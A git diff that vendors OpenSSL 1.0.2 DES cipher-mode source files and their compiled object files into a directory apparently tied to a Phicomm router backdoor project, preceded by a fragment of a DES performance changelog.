+Svend Olaf Mikkelsen <svolaf@inet.uni-c.dk> which does raw ecb DES calls at
+273,000 per second.  He had a previous version at 250,000 and the best
+I was able to get was 203,000.  The content has not changed, this is all
+due to instruction sequencing (and actual instructions choice) which is able
+to keep both functional units of the pentium going.
+We may have lost the ugly register usage restrictions when x86 went 32 bit
+but for the pentium it has been replaced by evil instruction ordering tricks.
+
+13 Jan 1997 - des-som3.pl, more optimizations from Svend Olaf.
+raw DES at 281,000 per second on a pentium 100.
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cbc3_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cbc3_enc.c
new file mode 100644
index 0000000..249518a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cbc3_enc.c
@@ -0,0 +1,95 @@
+/* crypto/des/cbc3_enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "des_locl.h"
+
+/* HAS BUGS! DON'T USE - this is only present for use in des.c */
+void DES_3cbc_encrypt(DES_cblock *input, DES_cblock *output, long length,
+                      DES_key_schedule ks1, DES_key_schedule ks2,
+                      DES_cblock *iv1, DES_cblock *iv2, int enc)
+{
+    int off = ((int)length - 1) / 8;
+    long l8 = ((length + 7) / 8) * 8;
+    DES_cblock niv1, niv2;
+
+    if (enc == DES_ENCRYPT) {
+        DES_cbc_encrypt((unsigned char *)input,
+                        (unsigned char *)output, length, &ks1, iv1, enc);
+        if (length >= sizeof(DES_cblock))
+            memcpy(niv1, output[off], sizeof(DES_cblock));
+        DES_cbc_encrypt((unsigned char *)output,
+                        (unsigned char *)output, l8, &ks2, iv1, !enc);
+        DES_cbc_encrypt((unsigned char *)output,
+                        (unsigned char *)output, l8, &ks1, iv2, enc);
+        if (length >= sizeof(DES_cblock))
+            memcpy(niv2, output[off], sizeof(DES_cblock));
+    } else {
+        if (length >= sizeof(DES_cblock))
+            memcpy(niv2, input[off], sizeof(DES_cblock));
+        DES_cbc_encrypt((unsigned char *)input,
+                        (unsigned char *)output, l8, &ks1, iv2, enc);
+        DES_cbc_encrypt((unsigned char *)output,
+                        (unsigned char *)output, l8, &ks2, iv1, !enc);
+        if (length >= sizeof(DES_cblock))
+            memcpy(niv1, output[off], sizeof(DES_cblock));
+        DES_cbc_encrypt((unsigned char *)output,
+                        (unsigned char *)output, length, &ks1, iv1, enc);
+    }
+    memcpy(*iv1, niv1, sizeof(DES_cblock));
+    memcpy(*iv2, niv2, sizeof(DES_cblock));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cbc_cksm.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cbc_cksm.c
new file mode 100644
index 0000000..f89b5b9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cbc_cksm.c
@@ -0,0 +1,103 @@
+/* crypto/des/cbc_cksm.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "des_locl.h"
+
+DES_LONG DES_cbc_cksum(const unsigned char *in, DES_cblock *output,
+                       long length, DES_key_schedule *schedule,
+                       const_DES_cblock *ivec)
+{
+    register DES_LONG tout0, tout1, tin0, tin1;
+    register long l = length;
+    DES_LONG tin[2];
+    unsigned char *out = &(*output)[0];
+    const unsigned char *iv = &(*ivec)[0];
+
+    c2l(iv, tout0);
+    c2l(iv, tout1);
+    for (; l > 0; l -= 8) {
+        if (l >= 8) {
+            c2l(in, tin0);
+            c2l(in, tin1);
+        } else
+            c2ln(in, tin0, tin1, l);
+
+        tin0 ^= tout0;
+        tin[0] = tin0;
+        tin1 ^= tout1;
+        tin[1] = tin1;
+        DES_encrypt1((DES_LONG *)tin, schedule, DES_ENCRYPT);
+        /* fix 15/10/91 eay - thanks to keithr@sco.COM */
+        tout0 = tin[0];
+        tout1 = tin[1];
+    }
+    if (out != NULL) {
+        l2c(tout0, out);
+        l2c(tout1, out);
+    }
+    tout0 = tin0 = tin1 = tin[0] = tin[1] = 0;
+    /*
+     * Transform the data in tout1 so that it will match the return value
+     * that the MIT Kerberos mit_des_cbc_cksum API returns.
+     */
+    tout1 = ((tout1 >> 24L) & 0x000000FF)
+        | ((tout1 >> 8L) & 0x0000FF00)
+        | ((tout1 << 8L) & 0x00FF0000)
+        | ((tout1 << 24L) & 0xFF000000);
+    return (tout1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cbc_cksm.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cbc_cksm.o
new file mode 100644
index 0000000000000000000000000000000000000000..bf7a9a3f266b0c59001674f88439509a9e8457ec
GIT binary patch
literal 2320
zcmbu9O>7%g5P+ZKO=BaoHmHY)7UY9L=BF!f%Z~sNd0ji+fJv(+rU%+?ovlk~YCE#m
zqA92xOp#V5X%4+{<;<}{2#G|6ibmo`>amwZs#>a4l_ILDf3VD~XWZ>}bAgfGzM1dM
zy!YnK+xK~)G&&Fp36_u;5f3e<LhK!UsApX@E8;>Hf5o4>r+rYGe+`*d9<zVdCdces
zW!?UJLbosJog0ZlH*!SpO3$akL$~v(h`OY8vyy)La(v+evd;aXQ}J$DblZ~N`8jg^
z3xxBN&%)=uf8ytwj^4RD_=!1Y#uiGUjS**U`D#LUR_u-S0rjFg?yM|djYNL~`*!@?
zyABMpaT1N?Ys2f3dRuj9aCt2e{oO|*(Yr3WsLvk*zkN=0C9kfi7j*lY-dT^>TT|cT
zx!6`pD%m&x1Xbj_u~avolCG<c<Gg?RiWM!`v6KcWN_zJ|3bNj{-OW1wi#6y*=$)Su
zA0E^WXa}`J=W&W)Dem6=Rx(|lYS*oH@=axzlG&lY(RNMs)Xt2OdG*B}7D9p<640<b
z#qqKj5Ml{g7#hmfUME5)_leMnL}*)VD6$BN<biLev9~d?Q8}?NFeVSrhYND@D=9Ch
zzZ}fVna-A?oDIiAaz>NWnw-qZ!#O#TlOq(nS%*_fV#5g<4+q{b+%xa`(WtPS<)aL(
zu$y%d58ho^L?3r{=XqiiKJ*xm0eRZ9fA{QwJp&Ev;Fk=5ApXuKT$od)Va~K_iYfAi
z34_dbO&G<}o}5-P_Kc2B6ef*HEmtZSu1~dYHs@w7RTxIgs+co|IXz<>t$chO*5Hic
zUbv_A0In*^9k5aGu3%2gU&6wHAb%1Xb7Uwu54IoB06{+#=HK>A!4+Ws4RKrxh56S#
zvwud+&k*PP%iJcOq@FpMLMW}dnpK&C-fH&xY1W$6;}ylKp0I>+q+(TsGSzAc#ih+g
zkC=^Gty%|%dc&$J@I&ozPn7JB>TPAV*_f?1tvL#;P8&y?m0GpG{{K{x5RWC;;+rQ+
zHs3cMrgE_<wt<E<$@WQ4S*2e~CysT%SgzAB@fV2u|HM!I3z5Gcze02V*Z9|IeXOfj
zKBI+rpFGC*k8Kr{p#0P1xJZteKfam%{6~P{QuyC`<t(lLvKNBR`Ey_NFt6*6?BIm~
zzWagUtK-jqiQ<zm<`v#Qvj!;W>W^Qg_`~c-y+8gK@SyYij?RzIAI}e8O^#<Cv^Fl4
rr48++ec;;?6p!zf|L$P?BEfMqJVMj;$y1;O#s5M3pX+<}6o34`YmX6*

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cbc_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cbc_enc.c
new file mode 100644
index 0000000..7ee3599
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cbc_enc.c
@@ -0,0 +1,61 @@
+/* crypto/des/cbc_enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#define CBC_ENC_C__DONT_UPDATE_IV
+
+#include "ncbc_enc.c"           /* des_cbc_encrypt */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cbc_enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cbc_enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..8cd405fe068596f2a5f62c65ea38a2fed547ec6c
GIT binary patch
literal 3216
zcmbuAO>7%Q6vt;{w{f6d8wABt5%R$x^HIx7DsVv!UU%(`#ij`~X(K_|I*yB>O;R}<
z)RYJ$+@c*B({kYm964}62=%}z4j)nw4QVNY6KZox(jtm_N&2<CH=aq|ts@~AX+1N)
zd2i;;`@dbkn=!L(ib7;lNEf+1la!G8!0mC04^t#aRB|==$TfXmj{T<ZHEZP+eIUnf
z>iq+ID7#A89A&Gta(Pg%#xm6d{vLK^m{$Fd#=xI4BTBVtTAPZdDEmEgVm5gEV>r0y
z#B|X46bz~_`HgA^t<(c1n8wgPVrXY{?ff?wA7y4V%nnCW1{;nVl-bb`WmD0>BF0t)
zPOIopg+&uaF}BQ>QcjFkrUUimkW*SU*hN|e2dD2ETc%a;&s7#-E$ozT(kg83^j$aD
z0vH?4fg4WWEj|J2E)BY_YqAxSUDIZ1ebGlN3oAV*TpFZj>7nTrs{GQJ)pN=Zxyr4T
z;PGf1A-USrmO!qSZ8w#_fUcIOXzf9amKOZ)QDwf%y%0Rz?NayW`h^gixzwheTbl<u
z=3zb^Jl%`y9d($@22bz937fB92w(DRv$)JjeIe8_!%6c7O$0XM_S*Nl_7hitr*tiw
zJcpP+P{y}ZlB#?Ov4SK9D5IT|!X#0cgaK-R5+>?oLfTn>)WDyxN0?3_OoA;NogfWc
zLUEFiWYET_f<ygJNO2qF+5io>T%Z+-fO3IIDW`Ou>xOC>><o&d*Dp)eA}Ew|z|FAp
zOWjhYRS1{MbWzCkBg%vtL9ign)Mf(O%?P#ZW3<{X>Jm~Qk^zR85D3x8)oeAOE#_*w
z+YN1jDt~Y_4O-jTP;=8ss;qXo7ui|r&efMfj_SMxO3gWY@t4gYg)-YBMj>a5bC9oR
zT}(P1rk#y<#NN<2yz<@PEBp0V_5J#5y7es{@*i9Gu3gVXVgo}HqxM8(N4zth*rq)@
z!Kd0gPbcDu?T<GwA$~X_1kVO|x_1u{DBx*iK6tP_(CCPA>}8@H4JlhUwFgc?rI^4U
z7HefR&Z?o4Z5cKEp)adOYW|EG`(T5vCf?tutI0}xk9tb+rG07=kgmqkY9y_O(`qQK
z2E-=obodSMlfT_o%f6OhFpOPBf2Ws^-}X+1GatWwE8aRdAL+Q;nD2AXI=uZZelL*w
zo8sp=1hy3()Wh2}0Ihh}I-C@S3RZEn5HAoTv&Ry%^5hYlSlwoCS~soUY<5qk-|E-X
zX2#-HV2>6Wv8-`BUpQnHN{6h2`8N&|@{tG#Yhx2UH{hki_5un74eEwxQSx5}_u4;!
zhS0oxVI96%NGbOZH{6LOIPS9<9(k@<=JBA<7fo^C8Zvx75nL)PIo38dydyTrj|(m}
zko;}I<$EIenBX#A$%}%^cSrIU#eE|D)Z6Fg1dn?7F2Q3SzEkk0Jp6gV6CS=p@a-Pn
zDR{)g#gvfv_~eM4AA;U4H~Nwsm5Yb-al3fbCh_6CohR|3@o^I8v^>@zg|U&5;wTu5
zj@iXHe0a9;f)n%CM<?P(%40{0WqVRM7E9K_a(<+^cK-hyM8F@V*y!0OCFb&dl*>Xk
zIpyyu)?R9jGzKZL;pc*59igwRGg%Lh2`<tstO@zb3&e`|eAE~B^qT)$|7XA#_r&^Z
zZeNQHlg$vuc-Q8J-=kLdUljN669MD>@xR4;fBbHtiL6H$@^)FA|D*(>m-m-_H*h&_
zHhst&sK;O0?t=k-mA&^53;&2T6updJ;xQQD`Ck8|@GnV2(R=;h1l}rtNnt4K1oMag
zD$-x_R%hc;pNaEj{_)$`${+v1ytRY=S5Pcyy^U_|*PHA6V5OCRp9pkv&9gD^`u_v+
CJRvLq

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cfb64ede.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cfb64ede.c
new file mode 100644
index 0000000..5d709c1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cfb64ede.c
@@ -0,0 +1,249 @@
+/* crypto/des/cfb64ede.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "des_locl.h"
+#include "e_os.h"
+
+/*
+ * The input and output encrypted as though 64bit cfb mode is being used.
+ * The extra state information to record how much of the 64bit block we have
+ * used is contained in *num;
+ */
+
+void DES_ede3_cfb64_encrypt(const unsigned char *in, unsigned char *out,
+                            long length, DES_key_schedule *ks1,
+                            DES_key_schedule *ks2, DES_key_schedule *ks3,
+                            DES_cblock *ivec, int *num, int enc)
+{
+    register DES_LONG v0, v1;
+    register long l = length;
+    register int n = *num;
+    DES_LONG ti[2];
+    unsigned char *iv, c, cc;
+
+    iv = &(*ivec)[0];
+    if (enc) {
+        while (l--) {
+            if (n == 0) {
+                c2l(iv, v0);
+                c2l(iv, v1);
+
+                ti[0] = v0;
+                ti[1] = v1;
+                DES_encrypt3(ti, ks1, ks2, ks3);
+                v0 = ti[0];
+                v1 = ti[1];
+
+                iv = &(*ivec)[0];
+                l2c(v0, iv);
+                l2c(v1, iv);
+                iv = &(*ivec)[0];
+            }
+            c = *(in++) ^ iv[n];
+            *(out++) = c;
+            iv[n] = c;
+            n = (n + 1) & 0x07;
+        }
+    } else {
+        while (l--) {
+            if (n == 0) {
+                c2l(iv, v0);
+                c2l(iv, v1);
+
+                ti[0] = v0;
+                ti[1] = v1;
+                DES_encrypt3(ti, ks1, ks2, ks3);
+                v0 = ti[0];
+                v1 = ti[1];
+
+                iv = &(*ivec)[0];
+                l2c(v0, iv);
+                l2c(v1, iv);
+                iv = &(*ivec)[0];
+            }
+            cc = *(in++);
+            c = iv[n];
+            iv[n] = cc;
+            *(out++) = c ^ cc;
+            n = (n + 1) & 0x07;
+        }
+    }
+    v0 = v1 = ti[0] = ti[1] = c = cc = 0;
+    *num = n;
+}
+
+#ifdef undef                    /* MACRO */
+void DES_ede2_cfb64_encrypt(unsigned char *in, unsigned char *out,
+                            long length, DES_key_schedule ks1,
+                            DES_key_schedule ks2, DES_cblock (*ivec),
+                            int *num, int enc)
+{
+    DES_ede3_cfb64_encrypt(in, out, length, ks1, ks2, ks1, ivec, num, enc);
+}
+#endif
+
+/*
+ * This is compatible with the single key CFB-r for DES, even thought that's
+ * not what EVP needs.
+ */
+
+void DES_ede3_cfb_encrypt(const unsigned char *in, unsigned char *out,
+                          int numbits, long length, DES_key_schedule *ks1,
+                          DES_key_schedule *ks2, DES_key_schedule *ks3,
+                          DES_cblock *ivec, int enc)
+{
+    register DES_LONG d0, d1, v0, v1;
+    register unsigned long l = length, n = ((unsigned int)numbits + 7) / 8;
+    register int num = numbits, i;
+    DES_LONG ti[2];
+    unsigned char *iv;
+    unsigned char ovec[16];
+
+    if (num > 64)
+        return;
+    iv = &(*ivec)[0];
+    c2l(iv, v0);
+    c2l(iv, v1);
+    if (enc) {
+        while (l >= n) {
+            l -= n;
+            ti[0] = v0;
+            ti[1] = v1;
+            DES_encrypt3(ti, ks1, ks2, ks3);
+            c2ln(in, d0, d1, n);
+            in += n;
+            d0 ^= ti[0];
+            d1 ^= ti[1];
+            l2cn(d0, d1, out, n);
+            out += n;
+            /*
+             * 30-08-94 - eay - changed because l>>32 and l<<32 are bad under
+             * gcc :-(
+             */
+            if (num == 32) {
+                v0 = v1;
+                v1 = d0;
+            } else if (num == 64) {
+                v0 = d0;
+                v1 = d1;
+            } else {
+                iv = &ovec[0];
+                l2c(v0, iv);
+                l2c(v1, iv);
+                l2c(d0, iv);
+                l2c(d1, iv);
+                /* shift ovec left most of the bits... */
+                memmove(ovec, ovec + num / 8, 8 + (num % 8 ? 1 : 0));
+                /* now the remaining bits */
+                if (num % 8 != 0)
+                    for (i = 0; i < 8; ++i) {
+                        ovec[i] <<= num % 8;
+                        ovec[i] |= ovec[i + 1] >> (8 - num % 8);
+                    }
+                iv = &ovec[0];
+                c2l(iv, v0);
+                c2l(iv, v1);
+            }
+        }
+    } else {
+        while (l >= n) {
+            l -= n;
+            ti[0] = v0;
+            ti[1] = v1;
+            DES_encrypt3(ti, ks1, ks2, ks3);
+            c2ln(in, d0, d1, n);
+            in += n;
+            /*
+             * 30-08-94 - eay - changed because l>>32 and l<<32 are bad under
+             * gcc :-(
+             */
+            if (num == 32) {
+                v0 = v1;
+                v1 = d0;
+            } else if (num == 64) {
+                v0 = d0;
+                v1 = d1;
+            } else {
+                iv = &ovec[0];
+                l2c(v0, iv);
+                l2c(v1, iv);
+                l2c(d0, iv);
+                l2c(d1, iv);
+                /* shift ovec left most of the bits... */
+                memmove(ovec, ovec + num / 8, 8 + (num % 8 ? 1 : 0));
+                /* now the remaining bits */
+                if (num % 8 != 0)
+                    for (i = 0; i < 8; ++i) {
+                        ovec[i] <<= num % 8;
+                        ovec[i] |= ovec[i + 1] >> (8 - num % 8);
+                    }
+                iv = &ovec[0];
+                c2l(iv, v0);
+                c2l(iv, v1);
+            }
+            d0 ^= ti[0];
+            d1 ^= ti[1];
+            l2cn(d0, d1, out, n);
+            out += n;
+        }
+    }
+    iv = &(*ivec)[0];
+    l2c(v0, iv);
+    l2c(v1, iv);
+    v0 = v1 = d0 = d1 = ti[0] = ti[1] = 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cfb64ede.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cfb64ede.o
new file mode 100644
index 0000000000000000000000000000000000000000..3b3527ec1d576371ce19409ba653ae17f5a70227
GIT binary patch
literal 4728
zcmc(jZ){sv6~M1!x3;_R>`ql>)Y4h-s9e@sb`wehBl2^flN;%UhSgakk>VzfOU9Z%
zN}snBB39vc^{X-E0}>#_*CEh8^b6IH_z<`Jt0va875e~aq#1&S4Cu<l($Ma4&U@$D
z&Q0=VAaSMl?zz8v&bjxVbKZ577c)k8i^s!6^RO<~7zxVQt4c#oIbw>1n8N-U+Ow)1
z>$Tp~p3w&Stlwza0d74y%1du|aH~}{DyBNatFvm<uyi$GR7TY)t+Hp7S9~9jfg27q
zmYm~N-_Fv{)U)UqQ8;w&#~>P?nMLts5YPX<c%ZkkL*<or)v%VhHLFIrl~tp>l2rqD
z9Yc^{2ot>)DCTcp>|?$5uk34vXOY{#D81!BxJ@e`vCG?*U;Y5@Ub{FT+}&~Ar7kAR
z+mrXT@-f@!gq;?Dq*;4-1x_@|+uZY+TimUce%|qg<JypRT>GMyyXFQBBL?BZSk3Ut
